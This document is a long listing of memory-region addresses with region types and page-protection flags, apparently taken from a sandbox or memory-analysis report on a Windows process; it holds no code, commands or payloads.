1FA58C80000
heap
page read and write
2AF0000
unkown
page read and write
6A60000
trusted library allocation
page read and write
7FFC9DBA0000
trusted library allocation
page execute and read and write
7980000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
782C000
trusted library allocation
page read and write
5E0000
heap
page read and write
1FA58D7F000
heap
page read and write
6AA0000
trusted library allocation
page read and write
2B16000
heap
page read and write
2550000
unkown
page read and write
63D0000
trusted library allocation
page read and write
29F0000
unkown
page readonly
1CD087E000
stack
page read and write
2DF8000
heap
page read and write
63C0000
trusted library allocation
page read and write
69AD000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
3147000
heap
page read and write
6760000
trusted library allocation
page read and write
1FA58DD1000
heap
page read and write
254588A0000
remote allocation
page read and write
6A20000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6789000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
2B27000
heap
page read and write
1B11AEA4000
trusted library allocation
page read and write
1FA58C93000
heap
page read and write
1B116CDD000
heap
page read and write
35D5000
trusted library allocation
page execute and read and write
24F0000
remote allocation
page read and write
7BD0000
trusted library allocation
page read and write
59C05FE000
stack
page read and write
185E8213000
heap
page read and write
6A30000
trusted library allocation
page read and write
278D000
stack
page read and write
6A60000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
2990000
heap
page read and write
77A0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
2F2E000
stack
page read and write
2B9F000
stack
page read and write
ACFA27E000
stack
page read and write
69BD000
trusted library allocation
page read and write
6A69000
trusted library allocation
page read and write
1B11A131000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
19C000
stack
page read and write
1B118CC0000
trusted library allocation
page read and write
18880242000
heap
page read and write
68F0000
trusted library allocation
page execute and read and write
38E000
stack
page read and write
67A0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
42FB000
trusted library allocation
page read and write
59C03FE000
stack
page read and write
15453A02000
trusted library allocation
page read and write
520000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page execute and read and write
1FA58CBE000
heap
page read and write
2DF0000
heap
page read and write
6AA0000
unkown
page read and write
2448000
heap
page read and write
6A66000
trusted library allocation
page read and write
15DFD5F0000
remote allocation
page read and write
400000
unkown
page readonly
2224000
heap
page read and write
67C5000
trusted library allocation
page read and write
1FA58D26000
heap
page read and write
6AB0000
trusted library allocation
page read and write
1FA58C89000
heap
page read and write
6AA5000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
1B686000000
heap
page read and write
2C27000
heap
page read and write
254E000
stack
page read and write
27CC000
stack
page read and write
7C00000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
63A0000
trusted library allocation
page read and write
1E99CB60000
heap
page read and write
6A60000
trusted library allocation
page read and write
D0BE000
stack
page read and write
4135000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
22EC0448000
heap
page read and write
1FA58DF1000
heap
page read and write
3330000
heap
page read and write
10000000
direct allocation
page read and write
2ABC000
stack
page read and write
7960000
trusted library allocation
page execute and read and write
25FE000
stack
page read and write
6A60000
trusted library allocation
page read and write
1FA58CFC000
heap
page read and write
69E8000
trusted library allocation
page read and write
7FFC9DBE0000
trusted library allocation
page read and write
1B11A3DB000
trusted library allocation
page read and write
1FA58D9E000
heap
page read and write
63C5000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
400000
unkown
page readonly
1FA59802000
heap
page read and write
67A0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
2870000
heap
page read and write
6A66000
unkown
page read and write
63B6000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
6A60000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
3140000
heap
page read and write
67E0000
trusted library allocation
page read and write
6943000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
35A3000
trusted library allocation
page execute and read and write
79C0000
trusted library allocation
page read and write
4174000
trusted library allocation
page read and write
3200000
remote allocation
page read and write
56A000
heap
page read and write
2DC0000
heap
page read and write
29B0000
remote allocation
page read and write
7A00000
unkown
page read and write
7530000
trusted library allocation
page read and write
2310000
unkown
page read and write
7660000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
2F8E000
stack
page read and write
1F0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
1B130E0E000
heap
page read and write
3590000
trusted library allocation
page read and write
1FA58DD9000
heap
page read and write
6782000
trusted library allocation
page read and write
59C05F8000
stack
page read and write
6A60000
trusted library allocation
page read and write
1FA58C84000
heap
page read and write
1F4AA090000
heap
page read and write
6790000
trusted library allocation
page read and write
1B116BF0000
heap
page read and write
79F0000
trusted library allocation
page read and write
1545325C000
heap
page read and write
1FA59762000
heap
page read and write
63E0000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
6A65000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
62E000
stack
page read and write
D1BE000
stack
page read and write
6AA0000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
7FFC9DCE0000
trusted library allocation
page read and write
4278000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
6A59000
trusted library allocation
page read and write
1FA58C9F000
heap
page read and write
7B40000
trusted library allocation
page read and write
6AA6000
trusted library allocation
page read and write
74D000
stack
page read and write
6AA0000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
1FA58C3E000
heap
page read and write
6A67000
trusted library allocation
page read and write
6E4000
heap
page read and write
6A50000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
79D0000
trusted library allocation
page read and write
6A55000
unkown
page read and write
6A60000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7FFC9DA90000
trusted library allocation
page execute and read and write
76F0000
trusted library allocation
page read and write
1FA58CAC000
heap
page read and write
1B130EFA000
heap
page read and write
1FA58DC6000
heap
page read and write
1FA58D94000
heap
page read and write
79A0000
trusted library allocation
page read and write
1F4AA124000
heap
page read and write
4312000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1FA58D44000
heap
page read and write
7DF449170000
trusted library allocation
page execute and read and write
63E0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7910000
trusted library allocation
page read and write
63CC000
trusted library allocation
page read and write
2300000
unkown
page readonly
B553000
heap
page read and write
1B11A255000
trusted library allocation
page read and write
3523000
heap
page read and write
1FA58C92000
heap
page read and write
DFB2000
trusted library allocation
page read and write
D9034FD000
stack
page read and write
6A60000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
1FA58D3C000
heap
page read and write
6AB0000
trusted library allocation
page read and write
22EC0E02000
trusted library allocation
page read and write
2C7B000
stack
page read and write
1FA58D91000
heap
page read and write
7990000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
1FA58DF3000
heap
page read and write
1FA58D16000
heap
page read and write
6AA0000
trusted library allocation
page read and write
28FE000
stack
page read and write
1B1186D0000
trusted library allocation
page read and write
2C4E0FC000
stack
page read and write
63E0000
unkown
page execute and read and write
67F0000
trusted library allocation
page read and write
1FA58CA3000
heap
page read and write
67C0000
trusted library allocation
page read and write
18880202000
heap
page read and write
22EC03F0000
trusted library allocation
page read and write
ACFA17F000
stack
page read and write
7AC0000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
6AA5000
unkown
page read and write
1FA5976F000
heap
page read and write
1FA59722000
heap
page read and write
6A60000
trusted library allocation
page read and write
65E0000
heap
page read and write
2D60000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
42F2000
trusted library allocation
page read and write
619CAFE000
stack
page read and write
29F0000
unkown
page readonly
6780000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
1FA58C6F000
heap
page read and write
6AA0000
trusted library allocation
page read and write
18880302000
heap
page read and write
68D0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
1B118690000
heap
page read and write
6945000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
3310000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
1FA58D27000
heap
page read and write
6A50000
trusted library allocation
page read and write
79D0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
2AE0000
unkown
page read and write
15DFD600000
heap
page read and write
3350000
trusted library allocation
page read and write
2056000
trusted library allocation
page read and write
3D80000
trusted library allocation
page read and write
29B8000
heap
page read and write
6AA0000
trusted library allocation
page read and write
2B16000
heap
page read and write
67A0000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
1FA58DA2000
heap
page read and write
1B11A230000
trusted library allocation
page read and write
2DDE000
unkown
page read and write
6480000
heap
page execute and read and write
6AA0000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
1FA58C29000
heap
page read and write
133C000
stack
page read and write
7660000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
3370000
trusted library allocation
page read and write
6750000
trusted library allocation
page read and write
185E8120000
heap
page read and write
59BFEA7000
stack
page read and write
6AA0000
trusted library allocation
page read and write
1FA58C13000
heap
page read and write
6B4000
heap
page read and write
2B12000
heap
page read and write
7A70000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6928000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1FA58DA5000
heap
page read and write
29B0000
remote allocation
page read and write
2C1F000
stack
page read and write
2B10000
heap
page read and write
1380000
unkown
page readonly
6A55000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
25458002000
heap
page read and write
3340000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
B562000
heap
page read and write
6AA0000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
7845000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
249D000
stack
page read and write
7A00000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
1FA58C8F000
heap
page read and write
79B0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
185E826A000
heap
page read and write
6A00000
trusted library allocation
page read and write
570927E000
stack
page read and write
1B686B6F000
heap
page read and write
1F4A9F50000
heap
page read and write
7660000
trusted library allocation
page read and write
258F000
stack
page read and write
2FFE000
stack
page read and write
CF7E000
stack
page read and write
1E90000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
2FF0000
remote allocation
page read and write
185E8267000
heap
page read and write
6AA0000
unkown
page read and write
7900000
trusted library allocation
page read and write
4100000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
7AA0000
trusted library allocation
page read and write
1E99CC13000
heap
page read and write
1E0000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
1476000
unkown
page read and write
79E0000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
1FA58C00000
heap
page read and write
7870000
trusted library allocation
page read and write
69D4000
trusted library allocation
page read and write
10B4F000
direct allocation
page read and write
2B37000
heap
page read and write
2FBE000
stack
page read and write
1A39000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
570967F000
stack
page read and write
67C0000
trusted library allocation
page read and write
2F60000
heap
page read and write
1FA58D7C000
heap
page read and write
2FF0000
remote allocation
page read and write
185E8180000
heap
page read and write
1FA58DFF000
heap
page read and write
3340000
trusted library allocation
page read and write
427000
unkown
page readonly
3340000
trusted library allocation
page read and write
28CE000
stack
page read and write
63C5000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
1FA58CBC000
heap
page read and write
1FA58D65000
heap
page read and write
6890000
trusted library allocation
page read and write
1545323D000
heap
page read and write
67F0000
trusted library allocation
page read and write
15DFF200000
trusted library allocation
page read and write
1F4AA110000
heap
page read and write
68E0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
7B95000
trusted library allocation
page read and write
6979000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
7FFC9DCB0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
4253000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
3E6F000
stack
page read and write
15453200000
heap
page read and write
691A000
trusted library allocation
page read and write
6965000
trusted library allocation
page read and write
1CD0C78000
stack
page read and write
63E0000
trusted library allocation
page read and write
ACF9C7B000
stack
page read and write
2A20000
heap
page read and write
6AA0000
trusted library allocation
page read and write
3F98000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1FA58D4B000
heap
page read and write
7A5E000
stack
page read and write
1FA58D87000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
2CEE000
stack
page read and write
6AB7000
trusted library allocation
page read and write
6405000
trusted library allocation
page read and write
154531A0000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
13AA000
unkown
page read and write
6934000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
423000
unkown
page read and write
6A50000
unkown
page read and write
1FA58D33000
heap
page read and write
1FA58DF7000
heap
page read and write
67C0000
trusted library allocation
page read and write
2D9F000
stack
page read and write
7950000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
9D000
stack
page read and write
7670000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
6A65000
unkown
page read and write
4458000
trusted library allocation
page read and write
1B11B747000
trusted library allocation
page read and write
2970000
heap
page read and write
6A6A000
trusted library allocation
page read and write
87F000
stack
page read and write
AAD4000
unkown
page readonly
25C0000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
4DC000
stack
page read and write
6A55000
trusted library allocation
page read and write
7820000
trusted library allocation
page execute and read and write
3F30000
heap
page execute and read and write
68D6000
trusted library allocation
page read and write
1B116CE9000
heap
page read and write
500000
heap
page read and write
426F000
trusted library allocation
page read and write
1FA59804000
heap
page read and write
761E000
stack
page read and write
683E000
stack
page read and write
6A65000
unkown
page read and write
1B130ED5000
heap
page read and write
7990000
trusted library allocation
page read and write
30000
heap
page read and write
188801F0000
heap
page read and write
B605000
heap
page read and write
1B130E63000
heap
page read and write
6A40000
trusted library allocation
page read and write
185E822E000
heap
page read and write
1B11B419000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
6A75000
trusted library allocation
page read and write
1B118CB1000
trusted library allocation
page read and write
7A05000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
6A20000
trusted library allocation
page execute and read and write
6790000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1B118620000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
619CBFE000
stack
page read and write
1B118784000
trusted library allocation
page read and write
1B128D42000
trusted library allocation
page read and write
69B3000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
35B9000
trusted library allocation
page read and write
220000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
1B118C90000
trusted library allocation
page read and write
2E2F000
stack
page read and write
7FFC9DC40000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
251D000
stack
page read and write
63E0000
trusted library allocation
page read and write
7850000
trusted library allocation
page read and write
1B11B73E000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1B118CB0000
trusted library allocation
page read and write
7D0000
heap
page read and write
4CE0000
heap
page read and write
6790000
trusted library allocation
page read and write
69A4000
trusted library allocation
page read and write
E09000
unkown
page read and write
2950000
heap
page read and write
6AA0000
unkown
page read and write
7955000
trusted library allocation
page read and write
2541ADD0000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
2BDE000
stack
page read and write
6AB0000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
1FA58C77000
heap
page read and write
7858000
trusted library allocation
page read and write
B558000
heap
page read and write
304F000
stack
page read and write
6790000
trusted library allocation
page read and write
3090000
trusted library allocation
page read and write
29E0000
unkown
page readonly
7A07000
trusted library allocation
page read and write
1D4FEE41000
heap
page read and write
2F7E000
stack
page read and write
6A60000
trusted library allocation
page read and write
2D5F000
unkown
page read and write
EF5E97E000
stack
page read and write
7660000
trusted library allocation
page read and write
1E99D602000
heap
page read and write
1B118CB0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
185E823A000
heap
page read and write
2B5E000
stack
page read and write
2B80000
heap
page read and write
63F0000
trusted library allocation
page read and write
2B5E000
unkown
page read and write
B614000
heap
page read and write
22EC0431000
heap
page read and write
77EB000
trusted library allocation
page read and write
6460000
trusted library allocation
page read and write
1FA59827000
heap
page read and write
3C5E000
stack
page read and write
7965000
trusted library allocation
page read and write
B614000
heap
page read and write
2CB0000
heap
page read and write
6A60000
trusted library allocation
page read and write
5CC07F9000
stack
page read and write
6A54000
unkown
page read and write
6A60000
trusted library allocation
page read and write
7FFC9DC67000
trusted library allocation
page read and write
67B0000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
69F7000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
10001000
direct allocation
page execute read
3440000
heap
page read and write
7820000
trusted library allocation
page read and write
1B118CA0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
6979000
trusted library allocation
page read and write
2541AD30000
heap
page read and write
1F0000
trusted library allocation
page read and write
323D000
stack
page read and write
1B128D4E000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
41AB000
trusted library allocation
page read and write
42C6000
trusted library allocation
page read and write
695C000
trusted library allocation
page read and write
67B0000
trusted library allocation
page read and write
B144000
unkown
page readonly
67C0000
trusted library allocation
page read and write
E06000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
1FA58D5F000
heap
page read and write
6A60000
trusted library allocation
page read and write
1FA59758000
heap
page read and write
7B10000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
1A1B000
unkown
page write copy
7960000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
1FA58D4D000
heap
page read and write
6AA5000
trusted library allocation
page read and write
67E0000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
1B1187C5000
heap
page read and write
690B000
trusted library allocation
page read and write
6952000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
67E0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
2FF0000
remote allocation
page read and write
6900000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
1B118CB0000
trusted library allocation
page read and write
6AAE000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
4140000
trusted library allocation
page read and write
2D0E000
stack
page read and write
6AB5000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
2D5E000
stack
page read and write
7FFC9D9D0000
trusted library allocation
page read and write
1B11B736000
trusted library allocation
page read and write
4438000
trusted library allocation
page read and write
4194000
trusted library allocation
page read and write
1FA58DDB000
heap
page read and write
1FA58D82000
heap
page read and write
2541AE13000
heap
page read and write
63F4000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
42D9000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
18880C02000
trusted library allocation
page read and write
435A000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
3AE000
stack
page read and write
63C5000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
345E000
stack
page read and write
63E0000
trusted library allocation
page read and write
351F000
stack
page read and write
1FA58D38000
heap
page read and write
35F0000
trusted library allocation
page read and write
7B20000
trusted library allocation
page read and write
1FA58CAA000
heap
page read and write
1FA58CD4000
heap
page read and write
6AB0000
trusted library allocation
page read and write
1FA58CA1000
heap
page read and write
67A0000
trusted library allocation
page read and write
6910000
trusted library allocation
page read and write
7665000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
2AF0000
unkown
page read and write
63FF000
trusted library allocation
page read and write
639B000
stack
page read and write
6780000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
927787E000
stack
page read and write
69A7000
trusted library allocation
page read and write
1FA58D3A000
heap
page read and write
7960000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
69B4000
trusted library allocation
page read and write
18C000
stack
page read and write
10B53000
direct allocation
page readonly
67D0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
62CE000
stack
page read and write
63E7000
trusted library allocation
page read and write
15DFD62A000
heap
page read and write
79A0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
41282FF000
stack
page read and write
6403000
trusted library allocation
page read and write
63E5000
trusted library allocation
page read and write
401000
unkown
page execute read
1478000
unkown
page write copy
7660000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
1BF9F6D0000
heap
page read and write
77F0000
trusted library allocation
page read and write
1FA59700000
heap
page read and write
10000000
direct allocation
page read and write
7990000
trusted library allocation
page read and write
1FA58C99000
heap
page read and write
7840000
trusted library allocation
page read and write
619C8FE000
stack
page read and write
1B686113000
heap
page read and write
76A0000
trusted library allocation
page read and write
2541B802000
trusted library allocation
page read and write
6A50000
unkown
page read and write
7840000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
2C47000
heap
page read and write
67F0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
690F000
trusted library allocation
page read and write
25458890000
trusted library allocation
page read and write
1FA58D45000
heap
page read and write
B5BC000
heap
page read and write
6A60000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
1B686C13000
heap
page read and write
18880229000
heap
page read and write
7860000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
440000
trusted library allocation
page read and write
1FA59754000
heap
page read and write
76E0000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
68C0000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
185E8258000
heap
page read and write
1E91000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
7FFC9DBB2000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
33A0000
heap
page read and write
2D5F000
stack
page read and write
6404000
trusted library allocation
page read and write
2F40000
remote allocation
page read and write
4212000
trusted library allocation
page read and write
1FA58DB7000
heap
page read and write
1B130EEF000
heap
page read and write
7BA5000
trusted library allocation
page read and write
1B118630000
heap
page readonly
1B11B422000
trusted library allocation
page read and write
1FA58DEF000
heap
page read and write
1FA58D2B000
heap
page read and write
2541AF02000
heap
page read and write
1FA59787000
heap
page read and write
7990000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
2B79000
heap
page read and write
35A4000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
24DC000
stack
page read and write
6AA0000
trusted library allocation
page read and write
185E825B000
heap
page read and write
7940000
trusted library allocation
page read and write
1381000
unkown
page execute read
7C80000
trusted library allocation
page read and write
2B9F000
stack
page read and write
1FA58CCC000
heap
page read and write
6AB0000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
59C047F000
stack
page read and write
63F6000
trusted library allocation
page read and write
1B686073000
heap
page read and write
1CD097A000
stack
page read and write
7960000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
7FFC9DA80000
trusted library allocation
page read and write
15DFD63D000
heap
page read and write
7FFC9DD40000
trusted library allocation
page read and write
1FA58CF6000
heap
page read and write
7B30000
trusted library allocation
page read and write
69D9000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1B686BBA000
heap
page read and write
6A50000
unkown
page read and write
7820000
trusted library allocation
page read and write
22EC0400000
heap
page read and write
67A0000
trusted library allocation
page read and write
2DAF000
unkown
page read and write
7670000
trusted library allocation
page read and write
2DF0000
heap
page read and write
6780000
trusted library allocation
page read and write
29F0000
remote allocation
page read and write
6A60000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
8F5D5CE000
stack
page read and write
40D6000
trusted library allocation
page read and write
59C037E000
stack
page read and write
63D0000
trusted library allocation
page read and write
1B11A0BE000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
D10000
unkown
page readonly
6AA0000
unkown
page read and write
422000
unkown
page write copy
43B9000
trusted library allocation
page read and write
1FA58CF9000
heap
page read and write
1B686BD8000
heap
page read and write
6A50000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
68E0000
unkown
page read and write
7FFC9DC00000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
D90377F000
stack
page read and write
7CE000
stack
page read and write
6A60000
trusted library allocation
page read and write
7FFC9DD30000
trusted library allocation
page read and write
69CB000
trusted library allocation
page read and write
2220000
heap
page read and write
1B116C80000
heap
page read and write
1FA58DD0000
heap
page read and write
2C1F000
stack
page read and write
423000
unkown
page read and write
6AB0000
trusted library allocation
page read and write
6AA0000
unkown
page read and write
2AC0000
unkown
page readonly
401000
unkown
page execute read
2C7A000
heap
page read and write
79C0000
trusted library allocation
page read and write
431B000
trusted library allocation
page read and write
6A67000
unkown
page read and write
69D0000
trusted library allocation
page read and write
1FA58CA2000
heap
page read and write
6A60000
trusted library allocation
page read and write
1FA58CA5000
heap
page read and write
1FA58D7A000
heap
page read and write
1FA59807000
heap
page read and write
2AC0000
unkown
page readonly
7523000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
1FA5980C000
heap
page read and write
7A00000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
7662000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
1A0000
remote allocation
page read and write
570977D000
stack
page read and write
79F0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
427000
unkown
page readonly
2DE0000
heap
page read and write
63E0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
3A0000
heap
page read and write
69F000
heap
page read and write
6790000
trusted library allocation
page read and write
2CCC000
stack
page read and write
6A50000
trusted library allocation
page read and write
1FA58BA0000
heap
page read and write
29F0000
unkown
page readonly
69BA000
trusted library allocation
page read and write
1FA58DA7000
heap
page read and write
6760000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
4F0000
heap
page read and write
ACF9D7D000
stack
page read and write
1FA58CB0000
heap
page read and write
6A20000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
1FA58C6F000
heap
page read and write
7A80000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
32CE000
stack
page read and write
6AA0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
421D000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
1FA58CB8000
heap
page read and write
1FA58C68000
heap
page read and write
6AA6000
trusted library allocation
page read and write
68B0000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
3340000
trusted library allocation
page read and write
7B60000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
6A30000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
185E827A000
heap
page read and write
7520000
trusted library allocation
page read and write
696B000
trusted library allocation
page read and write
78B0000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
2A7D000
stack
page read and write
6A5F000
trusted library allocation
page read and write
1B118EE2000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
1FA58D75000
heap
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
2550000
unkown
page read and write
6A60000
unkown
page read and write
EF5E87F000
stack
page read and write
7850000
trusted library allocation
page read and write
1E99CD13000
heap
page read and write
420A000
trusted library allocation
page read and write
40C1000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
15DFD700000
heap
page read and write
6A66000
unkown
page read and write
1F4AA405000
heap
